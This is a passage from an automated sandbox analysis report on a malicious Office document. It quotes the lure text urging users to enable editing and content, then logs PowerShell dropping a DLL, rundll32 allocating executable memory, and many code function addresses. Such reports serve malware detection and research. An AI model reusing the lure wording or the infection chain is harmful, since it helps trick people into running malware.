                    Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K . . . . O a S
                    Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K . . . . O a S
                    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Powershell drops PE fileShow sources
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dllJump to dropped file
                    Very long command line foundShow sources
                    Source: unknownProcess created: Commandline size = 7696
                    Source: unknownProcess created: Commandline size = 7605
                    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 7605
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Ocet\Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D270
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011EA7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012750
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012B5C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001237C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012F7C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E6005
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E3C28
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E7C4A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EC44B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F1079
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EE871
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F0065
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F4460
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EE499
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F9494
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FC48F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EBCA5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F5CCB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EA4E1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F1913
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E510E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F5136
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E6D2C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EDD24
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E3521
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FBD5E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E415F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F7D78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FA59F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FB59B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E7D94
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E4DB8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F41AD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E75A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F2DE1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E2A18
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E0A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F2A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00201600
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F6E50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F1E7D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E367A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F8279
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E6A6F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001ECA68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E628A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002012B6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E5EBA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E06B6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F66AE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F02A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F6AD5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F06D1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EC6CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001ED2C9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F96EA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E6EE4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F8EE2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E8B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F7713
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EEF04
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EFB05
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F473C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EAF28
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001ECF5B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E8355
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F4B48
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E1B46
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F2B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E5742
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001ED760
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F4F60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E2F97
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EE380
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EF3B5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FBFB0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E5BAC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E33AB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EA7A2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EB7C2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001EABF8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E27F4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001E77F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F9BE4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00706C05
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00706E8A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070E360
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00715748
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071533C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00704121
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00709716
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070FB04
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007083F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071A7E4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00714DAD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071C19B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070F471
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00711C79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00718E79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070427A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00712A7D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00715060
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00710C65
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070D668
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070766F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00717A50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070884A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070D04B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00704828
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00703618
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00701600
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00713600
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070B0E1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00719AE2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00707AE4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071A2EA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007112D1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007176D5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070DEC9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007168CB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070D2CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007012B6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00706ABA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00710EA0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070C8A5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007172AE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071A094
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070F099
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071D08F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00718978
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00715B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00708F55
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070DB5B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071C95E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00704D5F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00706342
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00713745
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00702746
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00715D36
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070E924
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070BB28
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070792C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00718313
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00712513
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00710705
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00705D0E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007033F4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070B7F8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007139E1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070C3C2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071CBB0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070FFB5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007059B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007081A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070B3A2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00703FAB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007067AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00708994
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00703B97
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071B19F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0070EF80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00186005
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00183C28
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00187C4A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018C44B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00191079
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018E871
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00194460
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00190065
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018E499
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00199494
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019C48F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018BCA5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00195CCB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018A4E1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00191913
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018510E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00195136
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00186D2C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00183521
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018DD24
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019BD5E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018415F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00197D78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019B59B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019A59F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00187D94
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00184DB8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001941AD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001875A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00192DE1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00182A18
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00180A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00192A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A1600
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00196E50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00198279
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018367A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00191E7D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018CA68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00186A6F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018628A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00185EBA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A12B6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001806B6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001966AE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001902A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001906D1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00196AD5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018D2C9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018C6CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001996EA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00198EE2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00186EE4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00197713
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00188B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018EF04
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018FB05
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019473C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018AF28
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018CF5B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00188355
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00194B48
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00185742
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00192B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00181B46
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018D760
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00194F60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00182F97
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018E380
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019BFB0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018F3B5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001833AB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00185BAC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018A7A2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018B7C2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018ABF8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001877F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001827F4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00199BE4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00196005
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00193C28
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019C44B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00197C4A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A1079
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019E871
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A4460
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A0065
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019E499
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A9494
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001AC48F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019BCA5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A5CCB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019A4E1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A1913
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019510E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A5136
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00196D2C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00193521
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019DD24
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001ABD5E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019415F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A7D78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001AB59B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001AA59F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00197D94
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00194DB8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A41AD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001975A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A2DE1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00192A18
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00190A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A2A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001B1600
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A6E50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019367A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A8279
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A1E7D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019CA68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00196A6F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019628A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00195EBA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001B12B6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001906B6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A66AE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A02A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A06D1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A6AD5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019D2C9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019C6CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A96EA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A8EE2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00196EE4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A7713
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00198B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019FB05
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019EF04
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A473C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019AF28
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019CF5B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00198355
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A4B48
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00195742
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00191B46
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A2B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019D760
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A4F60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00192F97
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019E380
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001ABFB0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019F3B5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001933AB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00195BAC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019A7A2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019B7C2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019ABF8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001977F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001927F4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A9BE4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00256C05
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00256E8A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00254121
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026533C
